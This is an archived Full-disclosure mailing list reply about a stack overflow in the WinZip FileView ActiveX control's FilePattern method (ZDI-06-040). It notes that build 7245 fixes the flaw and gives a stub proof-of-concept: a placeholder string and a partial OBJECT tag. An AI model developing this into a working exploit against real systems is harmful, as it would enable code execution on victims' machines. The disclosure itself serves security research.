Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email firstname.lastname@example.org
Re: [Full-disclosure] ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability
From: Micheal Turner (wh1t3h4t3yahoo.co.uk)
Date: Tue Nov 14 2006 - 16:34:08 CST
7245 correctly resolves this issue; standard stack
overflow in WZFILEVIEW.FilePattern snatching EIP; PoC
WZFILEVIEW.FilePattern = "SMASHTHESTACKHERE"
<OBJECT ID="WZFILEVIEW" WIDTH=200 HEIGHT=200
All new Yahoo! Mail "The new Interface is stunning in its simplicity and ease of use." - PC Magazine
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/